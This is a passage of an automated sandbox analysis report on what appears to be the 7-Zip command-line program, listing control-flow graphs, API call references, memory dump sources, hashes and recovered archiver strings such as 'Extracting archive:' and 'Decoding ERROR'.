• fputs.MSVCRT ref: 002119EA
• LeaveCriticalSection.KERNEL32 ref: 00211A51
  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
• free.MSVCRT ref: 00211A14
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                                                                                • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                                                                                • API String ID: 676172275-580504279
                                                                                                                                                                                                                                • Opcode ID: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                                                                                                                • Instruction ID: 99deb694bd137d918c71f4d9372974fbc6e2c9a64000abb8f3a2ae840808e86d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85514A72315A82A2EB19AF25DAA43E96360FB64B90F445126DF7E07750CF38D4B4C300

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 3392 1f38e8-1f3977 call 1f1700 call 1f373c memmove 3397 1f3979-1f398d call 1f3864 free 3392->3397 3398 1f3992-1f39a5 3392->3398 3405 1f3cb6-1f3cc9 3397->3405 3400 1f39ab 3398->3400 3401 1f3a30-1f3a3d call 1f3864 3398->3401 3403 1f39ae-1f39c2 3400->3403 3411 1f3a3f-1f3a64 call 1f02a0 _CxxThrowException 3401->3411 3412 1f3a65-1f3a77 3401->3412 3406 1f3a1d-1f3a25 3403->3406 3407 1f39c4-1f39ec call 1f09e0 call 1d2130 3403->3407 3406->3403 3409 1f3a27-1f3a2b 3406->3409 3426 1f39ee-1f39f9 call 1d3314 3407->3426 3427 1f39fb 3407->3427 3409->3401 3411->3412 3415 1f3a79-1f3a7c 3412->3415 3416 1f3ae1-1f3b27 call 205f5c call 1f13e8 * 2 3412->3416 3420 1f3a7e-1f3aac call 1d3208 call 1d6e10 call 1d2130 3415->3420 3439 1f3b2d-1f3b30 3416->3439 3440 1f3c2a-1f3c46 free 3416->3440 3443 1f3aae-1f3abb call 1d3314 3420->3443 3444 1f3abd 3420->3444 3430 1f39fe-1f3a16 call 1db8f0 free 3426->3430 3427->3430 3430->3406 3442 1f3b33-1f3b56 call 1d2130 3439->3442 3445 1f3c48 3440->3445 3446 1f3c76-1f3c84 free 3440->3446 3460 1f3b68 3442->3460 3461 1f3b58-1f3b66 call 1d3314 3442->3461 3450 1f3ac0-1f3adf call 1db8f0 free 3443->3450 3444->3450 3451 1f3c4c-1f3c5f 3445->3451 3447 1f3c88-1f3c95 3446->3447 3452 1f3ca7-1f3caa 3447->3452 3453 1f3c97-1f3ca2 free * 2 3447->3453 3450->3416 3450->3420 3457 1f3c71-1f3c74 3451->3457 3458 1f3c61-1f3c6c free * 2 3451->3458 3452->3447 3459 1f3cac-1f3cb4 free 3452->3459 3453->3452 3457->3446 3457->3451 3458->3457 3459->3405 3464 1f3b6b-1f3ba1 call 1d2130 3460->3464 3461->3464 3468 1f3bb3 3464->3468 3469 1f3ba3-1f3bb1 call 1d3314 3464->3469 3471 1f3bb6-1f3bc6 3468->3471 3469->3471 3473 1f3bc8-1f3be2 call 1d4338 3471->3473 3474 1f3be4-1f3bf2 3471->3474 3473->3474 3478 1f3bfa-1f3c29 call 1f02a0 _CxxThrowException 3473->3478 3474->3442 3476 1f3bf8 3474->3476 3476->3440 3478->3440
APIs
  • Part of subcall function 001F373C: free.MSVCRT ref: 001F37FB
• memmove.MSVCRT ref: 001F396F
• free.MSVCRT ref: 001F3986
• free.MSVCRT ref: 001F3A11
• _CxxThrowException.MSVCRT ref: 001F3A5F
• free.MSVCRT ref: 001F3AD3
  • Part of subcall function 001F3864: free.MSVCRT ref: 001F3877
  • Part of subcall function 001F3864: free.MSVCRT ref: 001F3892
  • Part of subcall function 001F3864: free.MSVCRT ref: 001F389B
  • Part of subcall function 001F3864: free.MSVCRT ref: 001F38C6
  • Part of subcall function 001F3864: free.MSVCRT ref: 001F38CE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ExceptionThrowmemmove
• String ID: Cannot find archive$Duplicate archive path:
• API String ID: 3934437811-2067063536
• Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
• Instruction ID: 95f29508aeb1440f2ac8d4e2cb07efb40470c6de58321bca18d42618076501a8
• Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
• Instruction Fuzzy Hash: 9CA19472315B8992CA20EB16E89056EB3A1F7D5BD0F444512EFAE47B29DF3CC946CB10

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 3481 2042a2-2042c0 3483 2042c2-2042d0 3481->3483 3484 2042d5-2042d8 3481->3484 3483->3484 3485 2042e0-2043ab call 1f40c4 memmove call 1d3404 call 203a20 3484->3485 3486 2042da 3484->3486 3494 2043b1-2043b3 3485->3494 3495 2045d8-20468f call 1d3404 * 3 free * 2 call 1f419c 3485->3495 3486->3485 3497 2046c5-2046f4 free * 2 call 1f419c 3494->3497 3498 2043b9-2043d7 call 1fc684 3494->3498 3534 204691-204697 3495->3534 3535 204698-2046a0 3495->3535 3505 2046f6-2046fc 3497->3505 3506 2046fd-204705 3497->3506 3507 204728-204757 free * 2 call 1f419c 3498->3507 3508 2043dd-2043ef call 1d2130 3498->3508 3505->3506 3511 204707-20470d 3506->3511 3512 20470e-204719 3506->3512 3526 204760-204768 3507->3526 3527 204759-20475f 3507->3527 3522 2043f1-204401 call 1fcaac 3508->3522 3523 204403 3508->3523 3511->3512 3517 204721-204723 3512->3517 3518 20471b 3512->3518 3525 2047fe-204811 3517->3525 3518->3517 3532 204406-204441 call 1db8f0 free * 2 call 1f419c 3522->3532 3523->3532 3529 204771-20477c 3526->3529 3530 20476a-204770 3526->3530 3527->3526 3536 204784-204786 3529->3536 3537 20477e 3529->3537 3530->3529 3551 204443-204449 3532->3551 3552 20444a-204452 3532->3552 3534->3535 3541 2046a2-2046a8 3535->3541 3542 2046a9-2046b4 3535->3542 3536->3525 3543 2047f2-2047fb 3536->3543 3537->3536 3541->3542 3542->3543 3546 2046ba-2046c0 3542->3546 3543->3525 3546->3543 3551->3552 3553 204454-20445a 3552->3553 3554 20445b-20446c 3552->3554 3553->3554 3556 204472-204478 3554->3556 3557 203fa9-204033 memmove 3554->3557 3556->3557 3560 204054-204072 memmove 3557->3560 3561 204035-204052 memmove 3557->3561 3560->3543 3563 204078-2040e9 memmove call 1fc0fc call 1d3404 * 2 call 203d58 3560->3563 3561->3563 3573 2040ee-2040f2 3563->3573 3574 2040f8-20410a call 1d2130 3573->3574 3575 20447d-204480 3573->3575 3582 20410c-20411c call 1fcaac 3574->3582 3583 20411e 3574->3583 3576 204486-20450b call 1d3404 * 3 3575->3576 3577 20450c-20451b call 1f419c 3575->3577 3576->3577 3577->3525 3587 204121-20413a call 1db8f0 call 1f419c 3582->3587 3583->3587
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID:
• API String ID: 1534225298-3916222277
• Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
• Instruction ID: e4caf81a62f5baefe01874c72bb2ccfdabb6dcf2c438b8fb22e6de8d417598b8
• Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
• Instruction Fuzzy Hash: 78D14C77219BC596CB21EF25E0902AEBB60F7D6B44F444016DB8E43B6ADF78C599CB00
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: AddressProc$memmove
• String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
• API String ID: 2879976980-73314117
• Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
• Instruction ID: d41164f6901a15b9d47b16047dabb4719439d1bb873d4b4fe85aac0bed874479
• Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
• Instruction Fuzzy Hash: 83414976619A49D6DB20EF25F8843ADB3A1F794784F801526EB8E83764DF78C949CB00
APIs
• fputs.MSVCRT ref: 00211CF9
  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
• fputs.MSVCRT ref: 00211DEE
• fputs.MSVCRT ref: 00211F07
• fputs.MSVCRT ref: 00211F5C
  • Part of subcall function 0021171C: fputs.MSVCRT ref: 00211744
  • Part of subcall function 0021171C: fputs.MSVCRT ref: 00211758
  • Part of subcall function 0021171C: free.MSVCRT ref: 0021176B
  • Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
  • Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
• free.MSVCRT ref: 00211F86
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                                                                                                                • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                • API String ID: 2553544393-24972044
                                                                                                                                                                                                                                • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                • Instruction ID: d0e2a900e82c48e4eee3318789cb7c3d55b09e2001befda4f1ba6547f21dade6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0A14A66314A85AACA29EF62E5903ED7361F778B80F484126DB6E47B11DF78D8F4C301

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ExceptionThrowfputs
• String ID: Decoding ERROR
• API String ID: 117389134-2585761706
• Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
• Instruction ID: 3afbe86ff6e7f55b9def4c825bfb6ac025dd39c8b1c763a28866a94a08519832
• Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
• Instruction Fuzzy Hash: F731D46272A9C191CE30EF25E8803EDA3A1F7A1780F485523CA5E57758DF78C9E5CB01

APIs
  • Part of subcall function 001D6464: FreeLibrary.KERNELBASE(?,?,?,001D64E7), ref: 001D6475
  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
• GetProcAddress.KERNEL32 ref: 001FA8CA
• GetProcAddress.KERNEL32 ref: 001FA8E8
• GetProcAddress.KERNEL32 ref: 001FA908
• free.MSVCRT ref: 001FA985
• free.MSVCRT ref: 001FA996
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: AddressProcfree$FreeLibrarymemmove
• String ID: CreateObject$SetCaseSensitive$SetLargePageMode
• API String ID: 852969883-606380122
• Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
• Instruction ID: fa7c6282c5213fb597d70c05909f71d7393056aa8ea27c052c80c4ae695ee8d5
• Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
• Instruction Fuzzy Hash: AC41C076200B449ADB20EF26E85036E6360FB94B98F888525DF9E47765EF7CD886C340

APIs
• strcmp.MSVCRT ref: 0021B723
• fputs.MSVCRT ref: 0021B743
  • Part of subcall function 001D38C8: memmove.MSVCRT(001DA0E5), ref: 001D3907
  • Part of subcall function 001D3A64: memmove.MSVCRT ref: 001D3AAA
• GetTickCount.KERNEL32 ref: 0021B49E
  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
• strcmp.MSVCRT ref: 0021B4E3
• wcscmp.MSVCRT ref: 0021B502
• strcmp.MSVCRT ref: 0021B568
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: memmovestrcmp$CountTickfputsfreewcscmp
• String ID: .
• API String ID: 591578422-4150638102
• Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
• Instruction ID: ce55cc9901e852bd6a0ac1ba4abec7abe8754cc89bd1f3db64fcd82c77dfb143
• Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
• Instruction Fuzzy Hash: 8AA14B77710A85ABCB2ADF2AD69029DB3B1F764784F808016DB5A47B11DF34E8B6C700

APIs
• fputs.MSVCRT ref: 00212F7E
• fputs.MSVCRT ref: 00212F9D
• free.MSVCRT ref: 00212FB6
• free.MSVCRT ref: 00212FC1
  • Part of subcall function 001D2C78: free.MSVCRT ref: 001D2CAE
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
• free.MSVCRT ref: 00212FCC
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$fputs
• String ID: = $h<"
• API String ID: 2444650769-3841148799
• Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
• Instruction ID: 295eeb5d81bfb5351f5b9fe55a2aafd9d4ee533c4e4d5367ee488c9d68888d99
• Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
• Instruction Fuzzy Hash: 7D215162224940D5CA20EF25E4912AEA770EBF57D0F445223FF6E47B69DF38C99AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C11
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C19
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9C3B
                                                                                                                                                                                                                                  • Part of subcall function 001F9BCC: free.MSVCRT ref: 001F9D2A
                                                                                                                                                                                                                                • wcscmp.MSVCRT ref: 001F9E66
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9ECA
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9ED4
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F13
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F1B
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F28
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F49
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F9F51
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmovewcscmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3584677832-0
                                                                                                                                                                                                                                • Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                • Instruction ID: bfcab6aa907e1443868649bc00cbc22b4684fdac69a714c96ef78b474b194993
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641E632304A8491CA10FF16E88026EA761F7A5BE8F495226EF7D47769DF38C84AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                                                • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                • Instruction ID: f50c6ea1cfa4aefd99b2b06836326a47cc1d6f466c9b2650a054f9ef7d2402e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46314E71124B82C6EB50DF28E99839A77B1F3A4764F511236EA7D436A4DF3CC995CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 352749199-0
                                                                                                                                                                                                                                • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction ID: e4ef4e695e48a218d70db35c5ec97545350d5d51ee80cab8657818017a6a3020
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D21FB75224B8186EB40DF29E95839A77B1F7A4764F501226EA7E437B4DF3CC949CB00
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
• fputs.MSVCRT ref: 002115D5
  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
Strings
Similarity
• API ID: fputs$memset
• String ID: Extracting archive: $Open$Testing archive:
• API String ID: 3543874852-295398807
APIs
• fputs.MSVCRT ref: 00212E47
• fputs.MSVCRT ref: 00212E57
• free.MSVCRT ref: 00212EA4
  • Part of subcall function 00212CFC: fputs.MSVCRT ref: 00212D41
  • Part of subcall function 00212CFC: fputs.MSVCRT ref: 00212DCF
  • Part of subcall function 00212CFC: free.MSVCRT ref: 00212DFF
Strings
Similarity
• API ID: fputs$free
• String ID: =
• API String ID: 3873070119-2525689732
APIs
• free.MSVCRT ref: 00204A5C
• free.MSVCRT ref: 00204A67
• free.MSVCRT ref: 00204AE4
  • Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339
• free.MSVCRT ref: 00204B0F
• free.MSVCRT ref: 00204B1A
  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
Similarity
• API ID: free$ExceptionThrowmallocmemmove
• String ID:
• API String ID: 3352498445-0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14118A6120894451DA10EA65E5512BA9760EFE13F4F945322BBBE477E9DF2CC94BCB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
